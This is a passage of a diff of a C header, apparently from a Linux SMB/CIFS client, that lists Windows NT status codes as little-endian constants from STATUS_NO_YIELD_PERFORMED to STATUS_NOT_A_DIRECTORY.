+-#define STATUS_NO_YIELD_PERFORMED cpu_to_le32(0x40000024)
+-#define STATUS_TIMER_RESUME_IGNORED cpu_to_le32(0x40000025)
+-#define STATUS_ARBITRATION_UNHANDLED cpu_to_le32(0x40000026)
+-#define STATUS_CARDBUS_NOT_SUPPORTED cpu_to_le32(0x40000027)
+-#define STATUS_WX86_CREATEWX86TIB cpu_to_le32(0x40000028)
+-#define STATUS_MP_PROCESSOR_MISMATCH cpu_to_le32(0x40000029)
+-#define STATUS_HIBERNATED cpu_to_le32(0x4000002A)
+-#define STATUS_RESUME_HIBERNATION cpu_to_le32(0x4000002B)
+-#define STATUS_FIRMWARE_UPDATED cpu_to_le32(0x4000002C)
+-#define STATUS_DRIVERS_LEAKING_LOCKED_PAGES cpu_to_le32(0x4000002D)
+-#define STATUS_MESSAGE_RETRIEVED cpu_to_le32(0x4000002E)
+-#define STATUS_SYSTEM_POWERSTATE_TRANSITION cpu_to_le32(0x4000002F)
+-#define STATUS_ALPC_CHECK_COMPLETION_LIST cpu_to_le32(0x40000030)
+-#define STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION cpu_to_le32(0x40000031)
+-#define STATUS_ACCESS_AUDIT_BY_POLICY cpu_to_le32(0x40000032)
+-#define STATUS_ABANDON_HIBERFILE cpu_to_le32(0x40000033)
+-#define STATUS_BIZRULES_NOT_ENABLED cpu_to_le32(0x40000034)
+-#define STATUS_WAKE_SYSTEM cpu_to_le32(0x40000294)
+-#define STATUS_DS_SHUTTING_DOWN cpu_to_le32(0x40000370)
+-#define DBG_REPLY_LATER cpu_to_le32(0x40010001)
+-#define DBG_UNABLE_TO_PROVIDE_HANDLE cpu_to_le32(0x40010002)
+-#define DBG_TERMINATE_THREAD cpu_to_le32(0x40010003)
+-#define DBG_TERMINATE_PROCESS cpu_to_le32(0x40010004)
+-#define DBG_CONTROL_C cpu_to_le32(0x40010005)
+-#define DBG_PRINTEXCEPTION_C cpu_to_le32(0x40010006)
+-#define DBG_RIPEXCEPTION cpu_to_le32(0x40010007)
+-#define DBG_CONTROL_BREAK cpu_to_le32(0x40010008)
+-#define DBG_COMMAND_EXCEPTION cpu_to_le32(0x40010009)
+-#define RPC_NT_UUID_LOCAL_ONLY cpu_to_le32(0x40020056)
+-#define RPC_NT_SEND_INCOMPLETE cpu_to_le32(0x400200AF)
+-#define STATUS_CTX_CDM_CONNECT cpu_to_le32(0x400A0004)
+-#define STATUS_CTX_CDM_DISCONNECT cpu_to_le32(0x400A0005)
+-#define STATUS_SXS_RELEASE_ACTIVATION_CONTEXT cpu_to_le32(0x4015000D)
+-#define STATUS_RECOVERY_NOT_NEEDED cpu_to_le32(0x40190034)
+-#define STATUS_RM_ALREADY_STARTED cpu_to_le32(0x40190035)
+-#define STATUS_LOG_NO_RESTART cpu_to_le32(0x401A000C)
+-#define STATUS_VIDEO_DRIVER_DEBUG_REPORT_REQUEST cpu_to_le32(0x401B00EC)
+-#define STATUS_GRAPHICS_PARTIAL_DATA_POPULATED cpu_to_le32(0x401E000A)
+-#define STATUS_GRAPHICS_DRIVER_MISMATCH cpu_to_le32(0x401E0117)
+-#define STATUS_GRAPHICS_MODE_NOT_PINNED cpu_to_le32(0x401E0307)
+-#define STATUS_GRAPHICS_NO_PREFERRED_MODE cpu_to_le32(0x401E031E)
+-#define STATUS_GRAPHICS_DATASET_IS_EMPTY cpu_to_le32(0x401E034B)
+-#define STATUS_GRAPHICS_NO_MORE_ELEMENTS_IN_DATASET cpu_to_le32(0x401E034C)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_PINNED cpu_to_le32(0x401E0351)
+-#define STATUS_GRAPHICS_UNKNOWN_CHILD_STATUS cpu_to_le32(0x401E042F)
+-#define STATUS_GRAPHICS_LEADLINK_START_DEFERRED cpu_to_le32(0x401E0437)
+-#define STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY cpu_to_le32(0x401E0439)
+-#define STATUS_GRAPHICS_START_DEFERRED cpu_to_le32(0x401E043A)
+-#define STATUS_NDIS_INDICATION_REQUIRED cpu_to_le32(0x40230001)
+-#define STATUS_GUARD_PAGE_VIOLATION cpu_to_le32(0x80000001)
+-#define STATUS_DATATYPE_MISALIGNMENT cpu_to_le32(0x80000002)
+-#define STATUS_BREAKPOINT cpu_to_le32(0x80000003)
+-#define STATUS_SINGLE_STEP cpu_to_le32(0x80000004)
+-#define STATUS_BUFFER_OVERFLOW cpu_to_le32(0x80000005)
+-#define STATUS_NO_MORE_FILES cpu_to_le32(0x80000006)
+-#define STATUS_WAKE_SYSTEM_DEBUGGER cpu_to_le32(0x80000007)
+-#define STATUS_HANDLES_CLOSED cpu_to_le32(0x8000000A)
+-#define STATUS_NO_INHERITANCE cpu_to_le32(0x8000000B)
+-#define STATUS_GUID_SUBSTITUTION_MADE cpu_to_le32(0x8000000C)
+-#define STATUS_PARTIAL_COPY cpu_to_le32(0x8000000D)
+-#define STATUS_DEVICE_PAPER_EMPTY cpu_to_le32(0x8000000E)
+-#define STATUS_DEVICE_POWERED_OFF cpu_to_le32(0x8000000F)
+-#define STATUS_DEVICE_OFF_LINE cpu_to_le32(0x80000010)
+-#define STATUS_DEVICE_BUSY cpu_to_le32(0x80000011)
+-#define STATUS_NO_MORE_EAS cpu_to_le32(0x80000012)
+-#define STATUS_INVALID_EA_NAME cpu_to_le32(0x80000013)
+-#define STATUS_EA_LIST_INCONSISTENT cpu_to_le32(0x80000014)
+-#define STATUS_INVALID_EA_FLAG cpu_to_le32(0x80000015)
+-#define STATUS_VERIFY_REQUIRED cpu_to_le32(0x80000016)
+-#define STATUS_EXTRANEOUS_INFORMATION cpu_to_le32(0x80000017)
+-#define STATUS_RXACT_COMMIT_NECESSARY cpu_to_le32(0x80000018)
+-#define STATUS_NO_MORE_ENTRIES cpu_to_le32(0x8000001A)
+-#define STATUS_FILEMARK_DETECTED cpu_to_le32(0x8000001B)
+-#define STATUS_MEDIA_CHANGED cpu_to_le32(0x8000001C)
+-#define STATUS_BUS_RESET cpu_to_le32(0x8000001D)
+-#define STATUS_END_OF_MEDIA cpu_to_le32(0x8000001E)
+-#define STATUS_BEGINNING_OF_MEDIA cpu_to_le32(0x8000001F)
+-#define STATUS_MEDIA_CHECK cpu_to_le32(0x80000020)
+-#define STATUS_SETMARK_DETECTED cpu_to_le32(0x80000021)
+-#define STATUS_NO_DATA_DETECTED cpu_to_le32(0x80000022)
+-#define STATUS_REDIRECTOR_HAS_OPEN_HANDLES cpu_to_le32(0x80000023)
+-#define STATUS_SERVER_HAS_OPEN_HANDLES cpu_to_le32(0x80000024)
+-#define STATUS_ALREADY_DISCONNECTED cpu_to_le32(0x80000025)
+-#define STATUS_LONGJUMP cpu_to_le32(0x80000026)
+-#define STATUS_CLEANER_CARTRIDGE_INSTALLED cpu_to_le32(0x80000027)
+-#define STATUS_PLUGPLAY_QUERY_VETOED cpu_to_le32(0x80000028)
+-#define STATUS_UNWIND_CONSOLIDATE cpu_to_le32(0x80000029)
+-#define STATUS_REGISTRY_HIVE_RECOVERED cpu_to_le32(0x8000002A)
+-#define STATUS_DLL_MIGHT_BE_INSECURE cpu_to_le32(0x8000002B)
+-#define STATUS_DLL_MIGHT_BE_INCOMPATIBLE cpu_to_le32(0x8000002C)
+-#define STATUS_STOPPED_ON_SYMLINK cpu_to_le32(0x8000002D)
+-#define STATUS_DEVICE_REQUIRES_CLEANING cpu_to_le32(0x80000288)
+-#define STATUS_DEVICE_DOOR_OPEN cpu_to_le32(0x80000289)
+-#define STATUS_DATA_LOST_REPAIR cpu_to_le32(0x80000803)
+-#define DBG_EXCEPTION_NOT_HANDLED cpu_to_le32(0x80010001)
+-#define STATUS_CLUSTER_NODE_ALREADY_UP cpu_to_le32(0x80130001)
+-#define STATUS_CLUSTER_NODE_ALREADY_DOWN cpu_to_le32(0x80130002)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_ONLINE cpu_to_le32(0x80130003)
+-#define STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE cpu_to_le32(0x80130004)
+-#define STATUS_CLUSTER_NODE_ALREADY_MEMBER cpu_to_le32(0x80130005)
+-#define STATUS_COULD_NOT_RESIZE_LOG cpu_to_le32(0x80190009)
+-#define STATUS_NO_TXF_METADATA cpu_to_le32(0x80190029)
+-#define STATUS_CANT_RECOVER_WITH_HANDLE_OPEN cpu_to_le32(0x80190031)
+-#define STATUS_TXF_METADATA_ALREADY_PRESENT cpu_to_le32(0x80190041)
+-#define STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET cpu_to_le32(0x80190042)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED cpu_to_le32(0x801B00EB)
+-#define STATUS_FLT_BUFFER_TOO_SMALL cpu_to_le32(0x801C0001)
+-#define STATUS_FVE_PARTIAL_METADATA cpu_to_le32(0x80210001)
+-#define STATUS_UNSUCCESSFUL cpu_to_le32(0xC0000001)
+-#define STATUS_NOT_IMPLEMENTED cpu_to_le32(0xC0000002)
+-#define STATUS_INVALID_INFO_CLASS cpu_to_le32(0xC0000003)
+-#define STATUS_INFO_LENGTH_MISMATCH cpu_to_le32(0xC0000004)
+-#define STATUS_ACCESS_VIOLATION cpu_to_le32(0xC0000005)
+-#define STATUS_IN_PAGE_ERROR cpu_to_le32(0xC0000006)
+-#define STATUS_PAGEFILE_QUOTA cpu_to_le32(0xC0000007)
+-#define STATUS_INVALID_HANDLE cpu_to_le32(0xC0000008)
+-#define STATUS_BAD_INITIAL_STACK cpu_to_le32(0xC0000009)
+-#define STATUS_BAD_INITIAL_PC cpu_to_le32(0xC000000A)
+-#define STATUS_INVALID_CID cpu_to_le32(0xC000000B)
+-#define STATUS_TIMER_NOT_CANCELED cpu_to_le32(0xC000000C)
+-#define STATUS_INVALID_PARAMETER cpu_to_le32(0xC000000D)
+-#define STATUS_NO_SUCH_DEVICE cpu_to_le32(0xC000000E)
+-#define STATUS_NO_SUCH_FILE cpu_to_le32(0xC000000F)
+-#define STATUS_INVALID_DEVICE_REQUEST cpu_to_le32(0xC0000010)
+-#define STATUS_END_OF_FILE cpu_to_le32(0xC0000011)
+-#define STATUS_WRONG_VOLUME cpu_to_le32(0xC0000012)
+-#define STATUS_NO_MEDIA_IN_DEVICE cpu_to_le32(0xC0000013)
+-#define STATUS_UNRECOGNIZED_MEDIA cpu_to_le32(0xC0000014)
+-#define STATUS_NONEXISTENT_SECTOR cpu_to_le32(0xC0000015)
+-#define STATUS_MORE_PROCESSING_REQUIRED cpu_to_le32(0xC0000016)
+-#define STATUS_NO_MEMORY cpu_to_le32(0xC0000017)
+-#define STATUS_CONFLICTING_ADDRESSES cpu_to_le32(0xC0000018)
+-#define STATUS_NOT_MAPPED_VIEW cpu_to_le32(0xC0000019)
+-#define STATUS_UNABLE_TO_FREE_VM cpu_to_le32(0xC000001A)
+-#define STATUS_UNABLE_TO_DELETE_SECTION cpu_to_le32(0xC000001B)
+-#define STATUS_INVALID_SYSTEM_SERVICE cpu_to_le32(0xC000001C)
+-#define STATUS_ILLEGAL_INSTRUCTION cpu_to_le32(0xC000001D)
+-#define STATUS_INVALID_LOCK_SEQUENCE cpu_to_le32(0xC000001E)
+-#define STATUS_INVALID_VIEW_SIZE cpu_to_le32(0xC000001F)
+-#define STATUS_INVALID_FILE_FOR_SECTION cpu_to_le32(0xC0000020)
+-#define STATUS_ALREADY_COMMITTED cpu_to_le32(0xC0000021)
+-#define STATUS_ACCESS_DENIED cpu_to_le32(0xC0000022)
+-#define STATUS_BUFFER_TOO_SMALL cpu_to_le32(0xC0000023)
+-#define STATUS_OBJECT_TYPE_MISMATCH cpu_to_le32(0xC0000024)
+-#define STATUS_NONCONTINUABLE_EXCEPTION cpu_to_le32(0xC0000025)
+-#define STATUS_INVALID_DISPOSITION cpu_to_le32(0xC0000026)
+-#define STATUS_UNWIND cpu_to_le32(0xC0000027)
+-#define STATUS_BAD_STACK cpu_to_le32(0xC0000028)
+-#define STATUS_INVALID_UNWIND_TARGET cpu_to_le32(0xC0000029)
+-#define STATUS_NOT_LOCKED cpu_to_le32(0xC000002A)
+-#define STATUS_PARITY_ERROR cpu_to_le32(0xC000002B)
+-#define STATUS_UNABLE_TO_DECOMMIT_VM cpu_to_le32(0xC000002C)
+-#define STATUS_NOT_COMMITTED cpu_to_le32(0xC000002D)
+-#define STATUS_INVALID_PORT_ATTRIBUTES cpu_to_le32(0xC000002E)
+-#define STATUS_PORT_MESSAGE_TOO_LONG cpu_to_le32(0xC000002F)
+-#define STATUS_INVALID_PARAMETER_MIX cpu_to_le32(0xC0000030)
+-#define STATUS_INVALID_QUOTA_LOWER cpu_to_le32(0xC0000031)
+-#define STATUS_DISK_CORRUPT_ERROR cpu_to_le32(0xC0000032)
+-#define STATUS_OBJECT_NAME_INVALID cpu_to_le32(0xC0000033)
+-#define STATUS_OBJECT_NAME_NOT_FOUND cpu_to_le32(0xC0000034)
+-#define STATUS_OBJECT_NAME_COLLISION cpu_to_le32(0xC0000035)
+-#define STATUS_PORT_DISCONNECTED cpu_to_le32(0xC0000037)
+-#define STATUS_DEVICE_ALREADY_ATTACHED cpu_to_le32(0xC0000038)
+-#define STATUS_OBJECT_PATH_INVALID cpu_to_le32(0xC0000039)
+-#define STATUS_OBJECT_PATH_NOT_FOUND cpu_to_le32(0xC000003A)
+-#define STATUS_OBJECT_PATH_SYNTAX_BAD cpu_to_le32(0xC000003B)
+-#define STATUS_DATA_OVERRUN cpu_to_le32(0xC000003C)
+-#define STATUS_DATA_LATE_ERROR cpu_to_le32(0xC000003D)
+-#define STATUS_DATA_ERROR cpu_to_le32(0xC000003E)
+-#define STATUS_CRC_ERROR cpu_to_le32(0xC000003F)
+-#define STATUS_SECTION_TOO_BIG cpu_to_le32(0xC0000040)
+-#define STATUS_PORT_CONNECTION_REFUSED cpu_to_le32(0xC0000041)
+-#define STATUS_INVALID_PORT_HANDLE cpu_to_le32(0xC0000042)
+-#define STATUS_SHARING_VIOLATION cpu_to_le32(0xC0000043)
+-#define STATUS_QUOTA_EXCEEDED cpu_to_le32(0xC0000044)
+-#define STATUS_INVALID_PAGE_PROTECTION cpu_to_le32(0xC0000045)
+-#define STATUS_MUTANT_NOT_OWNED cpu_to_le32(0xC0000046)
+-#define STATUS_SEMAPHORE_LIMIT_EXCEEDED cpu_to_le32(0xC0000047)
+-#define STATUS_PORT_ALREADY_SET cpu_to_le32(0xC0000048)
+-#define STATUS_SECTION_NOT_IMAGE cpu_to_le32(0xC0000049)
+-#define STATUS_SUSPEND_COUNT_EXCEEDED cpu_to_le32(0xC000004A)
+-#define STATUS_THREAD_IS_TERMINATING cpu_to_le32(0xC000004B)
+-#define STATUS_BAD_WORKING_SET_LIMIT cpu_to_le32(0xC000004C)
+-#define STATUS_INCOMPATIBLE_FILE_MAP cpu_to_le32(0xC000004D)
+-#define STATUS_SECTION_PROTECTION cpu_to_le32(0xC000004E)
+-#define STATUS_EAS_NOT_SUPPORTED cpu_to_le32(0xC000004F)
+-#define STATUS_EA_TOO_LARGE cpu_to_le32(0xC0000050)
+-#define STATUS_NONEXISTENT_EA_ENTRY cpu_to_le32(0xC0000051)
+-#define STATUS_NO_EAS_ON_FILE cpu_to_le32(0xC0000052)
+-#define STATUS_EA_CORRUPT_ERROR cpu_to_le32(0xC0000053)
+-#define STATUS_FILE_LOCK_CONFLICT cpu_to_le32(0xC0000054)
+-#define STATUS_LOCK_NOT_GRANTED cpu_to_le32(0xC0000055)
+-#define STATUS_DELETE_PENDING cpu_to_le32(0xC0000056)
+-#define STATUS_CTL_FILE_NOT_SUPPORTED cpu_to_le32(0xC0000057)
+-#define STATUS_UNKNOWN_REVISION cpu_to_le32(0xC0000058)
+-#define STATUS_REVISION_MISMATCH cpu_to_le32(0xC0000059)
+-#define STATUS_INVALID_OWNER cpu_to_le32(0xC000005A)
+-#define STATUS_INVALID_PRIMARY_GROUP cpu_to_le32(0xC000005B)
+-#define STATUS_NO_IMPERSONATION_TOKEN cpu_to_le32(0xC000005C)
+-#define STATUS_CANT_DISABLE_MANDATORY cpu_to_le32(0xC000005D)
+-#define STATUS_NO_LOGON_SERVERS cpu_to_le32(0xC000005E)
+-#define STATUS_NO_SUCH_LOGON_SESSION cpu_to_le32(0xC000005F)
+-#define STATUS_NO_SUCH_PRIVILEGE cpu_to_le32(0xC0000060)
+-#define STATUS_PRIVILEGE_NOT_HELD cpu_to_le32(0xC0000061)
+-#define STATUS_INVALID_ACCOUNT_NAME cpu_to_le32(0xC0000062)
+-#define STATUS_USER_EXISTS cpu_to_le32(0xC0000063)
+-#define STATUS_NO_SUCH_USER cpu_to_le32(0xC0000064)
+-#define STATUS_GROUP_EXISTS cpu_to_le32(0xC0000065)
+-#define STATUS_NO_SUCH_GROUP cpu_to_le32(0xC0000066)
+-#define STATUS_MEMBER_IN_GROUP cpu_to_le32(0xC0000067)
+-#define STATUS_MEMBER_NOT_IN_GROUP cpu_to_le32(0xC0000068)
+-#define STATUS_LAST_ADMIN cpu_to_le32(0xC0000069)
+-#define STATUS_WRONG_PASSWORD cpu_to_le32(0xC000006A)
+-#define STATUS_ILL_FORMED_PASSWORD cpu_to_le32(0xC000006B)
+-#define STATUS_PASSWORD_RESTRICTION cpu_to_le32(0xC000006C)
+-#define STATUS_LOGON_FAILURE cpu_to_le32(0xC000006D)
+-#define STATUS_ACCOUNT_RESTRICTION cpu_to_le32(0xC000006E)
+-#define STATUS_INVALID_LOGON_HOURS cpu_to_le32(0xC000006F)
+-#define STATUS_INVALID_WORKSTATION cpu_to_le32(0xC0000070)
+-#define STATUS_PASSWORD_EXPIRED cpu_to_le32(0xC0000071)
+-#define STATUS_ACCOUNT_DISABLED cpu_to_le32(0xC0000072)
+-#define STATUS_NONE_MAPPED cpu_to_le32(0xC0000073)
+-#define STATUS_TOO_MANY_LUIDS_REQUESTED cpu_to_le32(0xC0000074)
+-#define STATUS_LUIDS_EXHAUSTED cpu_to_le32(0xC0000075)
+-#define STATUS_INVALID_SUB_AUTHORITY cpu_to_le32(0xC0000076)
+-#define STATUS_INVALID_ACL cpu_to_le32(0xC0000077)
+-#define STATUS_INVALID_SID cpu_to_le32(0xC0000078)
+-#define STATUS_INVALID_SECURITY_DESCR cpu_to_le32(0xC0000079)
+-#define STATUS_PROCEDURE_NOT_FOUND cpu_to_le32(0xC000007A)
+-#define STATUS_INVALID_IMAGE_FORMAT cpu_to_le32(0xC000007B)
+-#define STATUS_NO_TOKEN cpu_to_le32(0xC000007C)
+-#define STATUS_BAD_INHERITANCE_ACL cpu_to_le32(0xC000007D)
+-#define STATUS_RANGE_NOT_LOCKED cpu_to_le32(0xC000007E)
+-#define STATUS_DISK_FULL cpu_to_le32(0xC000007F)
+-#define STATUS_SERVER_DISABLED cpu_to_le32(0xC0000080)
+-#define STATUS_SERVER_NOT_DISABLED cpu_to_le32(0xC0000081)
+-#define STATUS_TOO_MANY_GUIDS_REQUESTED cpu_to_le32(0xC0000082)
+-#define STATUS_GUIDS_EXHAUSTED cpu_to_le32(0xC0000083)
+-#define STATUS_INVALID_ID_AUTHORITY cpu_to_le32(0xC0000084)
+-#define STATUS_AGENTS_EXHAUSTED cpu_to_le32(0xC0000085)
+-#define STATUS_INVALID_VOLUME_LABEL cpu_to_le32(0xC0000086)
+-#define STATUS_SECTION_NOT_EXTENDED cpu_to_le32(0xC0000087)
+-#define STATUS_NOT_MAPPED_DATA cpu_to_le32(0xC0000088)
+-#define STATUS_RESOURCE_DATA_NOT_FOUND cpu_to_le32(0xC0000089)
+-#define STATUS_RESOURCE_TYPE_NOT_FOUND cpu_to_le32(0xC000008A)
+-#define STATUS_RESOURCE_NAME_NOT_FOUND cpu_to_le32(0xC000008B)
+-#define STATUS_ARRAY_BOUNDS_EXCEEDED cpu_to_le32(0xC000008C)
+-#define STATUS_FLOAT_DENORMAL_OPERAND cpu_to_le32(0xC000008D)
+-#define STATUS_FLOAT_DIVIDE_BY_ZERO cpu_to_le32(0xC000008E)
+-#define STATUS_FLOAT_INEXACT_RESULT cpu_to_le32(0xC000008F)
+-#define STATUS_FLOAT_INVALID_OPERATION cpu_to_le32(0xC0000090)
+-#define STATUS_FLOAT_OVERFLOW cpu_to_le32(0xC0000091)
+-#define STATUS_FLOAT_STACK_CHECK cpu_to_le32(0xC0000092)
+-#define STATUS_FLOAT_UNDERFLOW cpu_to_le32(0xC0000093)
+-#define STATUS_INTEGER_DIVIDE_BY_ZERO cpu_to_le32(0xC0000094)
+-#define STATUS_INTEGER_OVERFLOW cpu_to_le32(0xC0000095)
+-#define STATUS_PRIVILEGED_INSTRUCTION cpu_to_le32(0xC0000096)
+-#define STATUS_TOO_MANY_PAGING_FILES cpu_to_le32(0xC0000097)
+-#define STATUS_FILE_INVALID cpu_to_le32(0xC0000098)
+-#define STATUS_ALLOTTED_SPACE_EXCEEDED cpu_to_le32(0xC0000099)
+-#define STATUS_INSUFFICIENT_RESOURCES cpu_to_le32(0xC000009A)
+-#define STATUS_DFS_EXIT_PATH_FOUND cpu_to_le32(0xC000009B)
+-#define STATUS_DEVICE_DATA_ERROR cpu_to_le32(0xC000009C)
+-#define STATUS_DEVICE_NOT_CONNECTED cpu_to_le32(0xC000009D)
+-#define STATUS_DEVICE_POWER_FAILURE cpu_to_le32(0xC000009E)
+-#define STATUS_FREE_VM_NOT_AT_BASE cpu_to_le32(0xC000009F)
+-#define STATUS_MEMORY_NOT_ALLOCATED cpu_to_le32(0xC00000A0)
+-#define STATUS_WORKING_SET_QUOTA cpu_to_le32(0xC00000A1)
+-#define STATUS_MEDIA_WRITE_PROTECTED cpu_to_le32(0xC00000A2)
+-#define STATUS_DEVICE_NOT_READY cpu_to_le32(0xC00000A3)
+-#define STATUS_INVALID_GROUP_ATTRIBUTES cpu_to_le32(0xC00000A4)
+-#define STATUS_BAD_IMPERSONATION_LEVEL cpu_to_le32(0xC00000A5)
+-#define STATUS_CANT_OPEN_ANONYMOUS cpu_to_le32(0xC00000A6)
+-#define STATUS_BAD_VALIDATION_CLASS cpu_to_le32(0xC00000A7)
+-#define STATUS_BAD_TOKEN_TYPE cpu_to_le32(0xC00000A8)
+-#define STATUS_BAD_MASTER_BOOT_RECORD cpu_to_le32(0xC00000A9)
+-#define STATUS_INSTRUCTION_MISALIGNMENT cpu_to_le32(0xC00000AA)
+-#define STATUS_INSTANCE_NOT_AVAILABLE cpu_to_le32(0xC00000AB)
+-#define STATUS_PIPE_NOT_AVAILABLE cpu_to_le32(0xC00000AC)
+-#define STATUS_INVALID_PIPE_STATE cpu_to_le32(0xC00000AD)
+-#define STATUS_PIPE_BUSY cpu_to_le32(0xC00000AE)
+-#define STATUS_ILLEGAL_FUNCTION cpu_to_le32(0xC00000AF)
+-#define STATUS_PIPE_DISCONNECTED cpu_to_le32(0xC00000B0)
+-#define STATUS_PIPE_CLOSING cpu_to_le32(0xC00000B1)
+-#define STATUS_PIPE_CONNECTED cpu_to_le32(0xC00000B2)
+-#define STATUS_PIPE_LISTENING cpu_to_le32(0xC00000B3)
+-#define STATUS_INVALID_READ_MODE cpu_to_le32(0xC00000B4)
+-#define STATUS_IO_TIMEOUT cpu_to_le32(0xC00000B5)
+-#define STATUS_FILE_FORCED_CLOSED cpu_to_le32(0xC00000B6)
+-#define STATUS_PROFILING_NOT_STARTED cpu_to_le32(0xC00000B7)
+-#define STATUS_PROFILING_NOT_STOPPED cpu_to_le32(0xC00000B8)
+-#define STATUS_COULD_NOT_INTERPRET cpu_to_le32(0xC00000B9)
+-#define STATUS_FILE_IS_A_DIRECTORY cpu_to_le32(0xC00000BA)
+-#define STATUS_NOT_SUPPORTED cpu_to_le32(0xC00000BB)
+-#define STATUS_REMOTE_NOT_LISTENING cpu_to_le32(0xC00000BC)
+-#define STATUS_DUPLICATE_NAME cpu_to_le32(0xC00000BD)
+-#define STATUS_BAD_NETWORK_PATH cpu_to_le32(0xC00000BE)
+-#define STATUS_NETWORK_BUSY cpu_to_le32(0xC00000BF)
+-#define STATUS_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC00000C0)
+-#define STATUS_TOO_MANY_COMMANDS cpu_to_le32(0xC00000C1)
+-#define STATUS_ADAPTER_HARDWARE_ERROR cpu_to_le32(0xC00000C2)
+-#define STATUS_INVALID_NETWORK_RESPONSE cpu_to_le32(0xC00000C3)
+-#define STATUS_UNEXPECTED_NETWORK_ERROR cpu_to_le32(0xC00000C4)
+-#define STATUS_BAD_REMOTE_ADAPTER cpu_to_le32(0xC00000C5)
+-#define STATUS_PRINT_QUEUE_FULL cpu_to_le32(0xC00000C6)
+-#define STATUS_NO_SPOOL_SPACE cpu_to_le32(0xC00000C7)
+-#define STATUS_PRINT_CANCELLED cpu_to_le32(0xC00000C8)
+-#define STATUS_NETWORK_NAME_DELETED cpu_to_le32(0xC00000C9)
+-#define STATUS_NETWORK_ACCESS_DENIED cpu_to_le32(0xC00000CA)
+-#define STATUS_BAD_DEVICE_TYPE cpu_to_le32(0xC00000CB)
+-#define STATUS_BAD_NETWORK_NAME cpu_to_le32(0xC00000CC)
+-#define STATUS_TOO_MANY_NAMES cpu_to_le32(0xC00000CD)
+-#define STATUS_TOO_MANY_SESSIONS cpu_to_le32(0xC00000CE)
+-#define STATUS_SHARING_PAUSED cpu_to_le32(0xC00000CF)
+-#define STATUS_REQUEST_NOT_ACCEPTED cpu_to_le32(0xC00000D0)
+-#define STATUS_REDIRECTOR_PAUSED cpu_to_le32(0xC00000D1)
+-#define STATUS_NET_WRITE_FAULT cpu_to_le32(0xC00000D2)
+-#define STATUS_PROFILING_AT_LIMIT cpu_to_le32(0xC00000D3)
+-#define STATUS_NOT_SAME_DEVICE cpu_to_le32(0xC00000D4)
+-#define STATUS_FILE_RENAMED cpu_to_le32(0xC00000D5)
+-#define STATUS_VIRTUAL_CIRCUIT_CLOSED cpu_to_le32(0xC00000D6)
+-#define STATUS_NO_SECURITY_ON_OBJECT cpu_to_le32(0xC00000D7)
+-#define STATUS_CANT_WAIT cpu_to_le32(0xC00000D8)
+-#define STATUS_PIPE_EMPTY cpu_to_le32(0xC00000D9)
+-#define STATUS_CANT_ACCESS_DOMAIN_INFO cpu_to_le32(0xC00000DA)
+-#define STATUS_CANT_TERMINATE_SELF cpu_to_le32(0xC00000DB)
+-#define STATUS_INVALID_SERVER_STATE cpu_to_le32(0xC00000DC)
+-#define STATUS_INVALID_DOMAIN_STATE cpu_to_le32(0xC00000DD)
+-#define STATUS_INVALID_DOMAIN_ROLE cpu_to_le32(0xC00000DE)
+-#define STATUS_NO_SUCH_DOMAIN cpu_to_le32(0xC00000DF)
+-#define STATUS_DOMAIN_EXISTS cpu_to_le32(0xC00000E0)
+-#define STATUS_DOMAIN_LIMIT_EXCEEDED cpu_to_le32(0xC00000E1)
+-#define STATUS_OPLOCK_NOT_GRANTED cpu_to_le32(0xC00000E2)
+-#define STATUS_INVALID_OPLOCK_PROTOCOL cpu_to_le32(0xC00000E3)
+-#define STATUS_INTERNAL_DB_CORRUPTION cpu_to_le32(0xC00000E4)
+-#define STATUS_INTERNAL_ERROR cpu_to_le32(0xC00000E5)
+-#define STATUS_GENERIC_NOT_MAPPED cpu_to_le32(0xC00000E6)
+-#define STATUS_BAD_DESCRIPTOR_FORMAT cpu_to_le32(0xC00000E7)
+-#define STATUS_INVALID_USER_BUFFER cpu_to_le32(0xC00000E8)
+-#define STATUS_UNEXPECTED_IO_ERROR cpu_to_le32(0xC00000E9)
+-#define STATUS_UNEXPECTED_MM_CREATE_ERR cpu_to_le32(0xC00000EA)
+-#define STATUS_UNEXPECTED_MM_MAP_ERROR cpu_to_le32(0xC00000EB)
+-#define STATUS_UNEXPECTED_MM_EXTEND_ERR cpu_to_le32(0xC00000EC)
+-#define STATUS_NOT_LOGON_PROCESS cpu_to_le32(0xC00000ED)
+-#define STATUS_LOGON_SESSION_EXISTS cpu_to_le32(0xC00000EE)
+-#define STATUS_INVALID_PARAMETER_1 cpu_to_le32(0xC00000EF)
+-#define STATUS_INVALID_PARAMETER_2 cpu_to_le32(0xC00000F0)
+-#define STATUS_INVALID_PARAMETER_3 cpu_to_le32(0xC00000F1)
+-#define STATUS_INVALID_PARAMETER_4 cpu_to_le32(0xC00000F2)
+-#define STATUS_INVALID_PARAMETER_5 cpu_to_le32(0xC00000F3)
+-#define STATUS_INVALID_PARAMETER_6 cpu_to_le32(0xC00000F4)
+-#define STATUS_INVALID_PARAMETER_7 cpu_to_le32(0xC00000F5)
+-#define STATUS_INVALID_PARAMETER_8 cpu_to_le32(0xC00000F6)
+-#define STATUS_INVALID_PARAMETER_9 cpu_to_le32(0xC00000F7)
+-#define STATUS_INVALID_PARAMETER_10 cpu_to_le32(0xC00000F8)
+-#define STATUS_INVALID_PARAMETER_11 cpu_to_le32(0xC00000F9)
+-#define STATUS_INVALID_PARAMETER_12 cpu_to_le32(0xC00000FA)
+-#define STATUS_REDIRECTOR_NOT_STARTED cpu_to_le32(0xC00000FB)
+-#define STATUS_REDIRECTOR_STARTED cpu_to_le32(0xC00000FC)
+-#define STATUS_STACK_OVERFLOW cpu_to_le32(0xC00000FD)
+-#define STATUS_NO_SUCH_PACKAGE cpu_to_le32(0xC00000FE)
+-#define STATUS_BAD_FUNCTION_TABLE cpu_to_le32(0xC00000FF)
+-#define STATUS_VARIABLE_NOT_FOUND cpu_to_le32(0xC0000100)
+-#define STATUS_DIRECTORY_NOT_EMPTY cpu_to_le32(0xC0000101)
+-#define STATUS_FILE_CORRUPT_ERROR cpu_to_le32(0xC0000102)
+-#define STATUS_NOT_A_DIRECTORY cpu_to_le32(0xC0000103)
